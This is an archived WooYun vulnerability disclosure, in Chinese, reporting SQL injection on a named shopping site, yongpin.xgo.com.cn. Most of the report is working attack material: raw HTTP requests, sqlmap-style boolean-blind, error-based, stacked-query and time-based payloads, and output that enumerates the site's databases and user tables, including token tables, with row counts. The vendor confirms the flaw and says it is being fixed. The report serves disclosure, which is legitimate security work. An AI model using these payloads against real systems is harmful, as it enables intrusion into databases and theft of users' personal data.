乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-24: 细节已通知厂商并且等待厂商处理中 2015-06-25: 厂商已经确认,细节仅向厂商公开 2015-07-05: 细节向核心白帽子及相关领域专家公开 2015-07-15: 细节向普通白帽子公开 2015-07-25: 细节向实习白帽子公开 2015-08-09: 细节向公众公开
233
一顾茅庐:GET /index.php?brand_id=342&page=1&pro_shoe_flat=*&r=product/shoe HTTP/1.1X-Requested-With: XMLHttpRequestReferer: yongpin.xgo.com.cnCookie: Host: yongpin.xgo.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: */*二顾茅庐:GET /index.php?brand_id=342&page=1&pro_shoe_size=*&r=product/shoe HTTP/1.1X-Requested-With: XMLHttpRequestReferer: yongpin.xgo.com.cnCookie: Host: yongpin.xgo.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: */*三顾茅庐:GET /index.php?brand_id=342&page=1&pro_shoe_width=*&r=product/shoe HTTP/1.1X-Requested-With: XMLHttpRequestReferer: yongpin.xgo.com.cnCookie: Host: yongpin.xgo.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: */*
---Parameter: pro_shoe_size (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: brand_id=342&page=1&pro_shoe_size=-8646') OR 1145=1145 AND ('qSaI'='qSaI&r=product/shoe Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: brand_id=342&page=1&pro_shoe_size=1') AND (SELECT 3333 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(3333=3333,1))),0x7171717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('axIY'='axIY&r=product/shoe Type: stacked queries Title: MySQL < 5.0.12 stacked queries (heavy query - comment) Payload: brand_id=342&page=1&pro_shoe_size=1');SELECT BENCHMARK(5000000,MD5(0x4b6a7464))#&r=product/shoe Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: brand_id=342&page=1&pro_shoe_size=1') OR SLEEP(5) AND ('CxzS'='CxzS&r=product/shoe---web application technology: Apacheback-end DBMS: MySQL 5.0current user: '[email protected]'available databases [20]:[*] information_schema[*] test[*] xgo_active[*] xgo_bbs[*] xgo_bbs_admin[*] xgo_bbs_troop[*] xgo_comment[*] xgo_picture[*] xgo_plugin[*] xgo_product[*] xgo_product_stat[*] xgo_review[*] xgo_stat_hits[*] xgo_tips[*] xgo_tips_admin[*] xgo_topic[*] xgo_tuan[*] xgo_user[*] xgo_yongpin[*] xgo_zhuquDatabase: xgo_user+---------------------------+---------+| Table | Entries |+---------------------------+---------+| user_relations | 6387728 || userinfo | 1707478 || user_active_log | 1595044 || user_checkimg | 921394 || user_album_pic | 876639 || user_check_mobile_code | 875492 || user_message_2011 | 413961 || user_message_2014 | 394551 || user_online | 321710 || user_real | 309146 || user_extend | 309134 || user_mail_set | 309052 || user_message_2013 | 255437 || user_album_info | 230297 || user_score | 207002 || user_message | 167525 || user_register_log | 163113 || user_message_2012 | 156266 || user_oltime_2011 | 125514 || user_oltime_2013 | 125226 || userinfo_test | 123526 || userinfo_new | 111228 || user_visitor | 100592 || user_oltime_2012 | 93920 || user_oltime_2014 | 88678 || user_check_mail_code | 62122 || user_oltime_2015 | 55335 || x_invite_code | 39950 || z_login_api | 35261 || z_api_token | 16330 || tag_from_pic | 5881 || tag_from_user | 5881 || x_log_login_2013 | 4974 || x_user_score | 4950 || x_userinfo_extend | 4950 || audit_log | 4824 || x_check_mail_code | 4612 || user_car_list_product_rel | 4493 || user_comments | 3538 || x_log_send_mail_2013 | 3012 || user_tag2 | 2717 || x_register_history | 2608 || user_album_pic_tags | 2538 || china_city | 2489 || user_carport | 2352 || x_user_car | 1397 || x_log_login_2015 | 1200 || user_book_collection | 1132 || x_log_login_2014 | 1101 || user_interest_doc0 | 1080 || x_log_send_mail_2014 | 1080 || whitelistuser | 1043 || x_log_modify_pwd_2013 | 989 || user_obj_comments | 974 || x_check_mobile_code | 947 || tag | 890 || user_car_list | 814 || user_tag_num | 768 || x_register | 751 || x_log_send_mail_2015 | 613 || checkimg_group | 601 || china_town | 580 || gift_present | 425 || tag_user1 | 382 || tag_user8 | 351 || tag_user9 | 342 || x_oauth_bind | 337 || user_owner_info | 336 || tag_user7 | 330 || tag_user3 | 316 || user_hide | 312 || x_log_modify_pwd_2014 | 292 || tag_user5 | 287 || z_login_api_bark | 279 || tag_user6 | 274 || tag_user4 | 239 || gift_buy | 235 || tag_user2 | 227 || user_interest_doc17 | 144 || x_log_modify_pwd_2015 | 132 || user_car_list_vote_1 | 87 || china_province | 35 || gift | 32 || user_tag1 | 31 || user_active_cate | 30 || xgo_qq_session | 21 || user_rank | 9 || gift_sort | 6 || user_modify_pw_log | 5 || user_interest_doc18 | 2 || x_user_verify | 2 |+---------------------------+---------+
这个影响看看,凭良心。求 20 rank!
危害等级:高
漏洞Rank:20
确认时间:2015-06-25 10:28
感谢,已经在修复
暂无